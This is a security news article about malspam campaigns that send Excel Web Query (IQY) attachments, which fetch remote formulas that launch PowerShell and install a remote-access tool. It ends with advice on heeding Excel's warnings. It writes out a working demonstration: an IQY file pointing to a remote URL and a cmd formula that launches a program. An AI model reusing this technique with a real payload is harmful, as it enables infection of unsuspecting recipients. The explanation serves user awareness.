Malspam campaigns, such as ones being distributed by Necurs, are utilizing a new attachment type that is doing a good job in bypassing antivirus and mail filters. These IQY attachments are called Excel Web Query files and when opened will attempt to pull data from external sources.
The problem is that the external data being imported by the spreadsheet can also be a formula that will be executed by Excel. These formulas can then be used to locally launch PowerShell scripts that download and install malware onto the computer, which is explained later in the article.
According to a report by Barkly, there have been three spam campaigns utilizing IQY attachments. The first one was discovered on May 25th by MyOnlineSecurity where he reported how well they were bypassing AV filters. A second campaign was discovered by security researcher Magni R. Sigurdsson, and a third campaign was discovered again by MyOnlineSecurity today.
The spam emails pretend to be purchase orders, scanned documents, or unpaid invoices that contain IQY attachments as shown below.
When the IQY files are opened they connect to a remote site that executes PowerShell commands that ultimately download and install a preconfigured version of AMMYY Admin. AMMYY Admin is a legitimate remote administration tool that is being utilized by the attackers to gain remote access to a victim's computer.
IQY files are simply text files that contain a few lines consisting of the source type, the source location, various parameters to be used during the query, refresh intervals, etc. When opened, Excel will read the configuration and attempt to connect to the listed source and retrieve the data to be imported into the spreadsheet.
The problem is that the data returned from the external source can also contain Excel formulas that launch applications on the computer.
For example, to create a simple IQY file that opens the C:\Windows\System32\calc.exe file, I would create a file called test.iqy in Notepad and enter the following text:
WEB 1 https://www.bleepingcomputer.com/misc/test.txt 2 a 3 b 4 c 5
When a user opens the attachment, Excel will query the remote URL listed in the IQY file in order to retrieve data that will be imported into the spreadsheet. In our example, the test.txt file contains a formula that will be imported into Excel and then executed.
=cmd|' /c C:\Windows\System32\calc.exe'!A0
In this case, the formula launches the Calc.exe program on the computer.
The malspam campaigns are using the exact same method, but instead of starting Calculator, they are launching PowerShell commands that download and run scripts that ultimately install and execute malware on the computer.
The good news is that Excel provides plenty of warnings when a user opens a IQY file that "should" indicate that something is not right. Unfortunately, people tend to ignore warnings and thus get infected. This is why it is important to understand what you would see when you open a malicious IQY document and to not just click on the Enable and Yes buttons.
When an IQY file is first opened the user will be presented with a "Microsoft Excel Security Notice" that warns the user that an external data connection is being made. This is the first warning that something is not right and users should click on the "Disable" button so that the connection is not made.
If you instead click on the "Enable" button, you will eventually be presented with another warning that "Excel needs to start another application". Once again, don't allow this and click on the "No" button.
If you ignore this warning too, then it's too late and your computer has been infected with some sort of malware.
Therefore, be smart. Do not allow Excel to start other applications or create external connections or you will regret it.